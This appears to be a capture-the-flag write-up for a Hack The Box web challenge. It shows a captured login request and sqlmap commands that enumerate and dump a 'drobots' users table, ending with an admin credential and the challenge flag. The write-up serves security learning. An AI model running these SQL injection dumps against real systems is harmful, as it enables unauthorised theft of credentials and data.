![Pasted image 20230324121650.png](../assets/Pasted%20image%2020230324121650.png)

![Pasted image 20230324114836.png](../assets/Pasted%20image%2020230324114836.png)

![Pasted image 20230324114955.png](../assets/Pasted%20image%2020230324114955.png)

````python
POST http://159.65.81.51:32743/api/login HTTP/1.1
Host: 159.65.81.51:32743
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://159.65.81.51:32743/
Content-Type: application/json
Origin: http://159.65.81.51:32743
Content-Length: 39
Connection: close

{"username":"admin","password":"admin"}
````

````css
sqlmap -r request-new.txt --dbs --random-agent
````

![Pasted image 20230324120629.png](../assets/Pasted%20image%2020230324120629.png)

To retrieve the tables use

````css
sqlmap -r request-new.txt -D drobots --random-agent --tables
````

There is only one `users` table

````css
sqlmap -r request-new.txt -D drobots --random-agent -T users --dump
````

At first i thought the password is hashed and perform bruteforce with sqlmap's default wordlist but later on i found that the hashed string is the password.

![Pasted image 20230324120920.png](../assets/Pasted%20image%2020230324120920.png)

`admin:739025f319bf2fc8ecafa26f547defbc`

![Pasted image 20230324121053.png](../assets/Pasted%20image%2020230324121053.png)

flag: `HTB{p4r4m3t3r1z4t10n_1s_1mp0rt4nt!!!}`
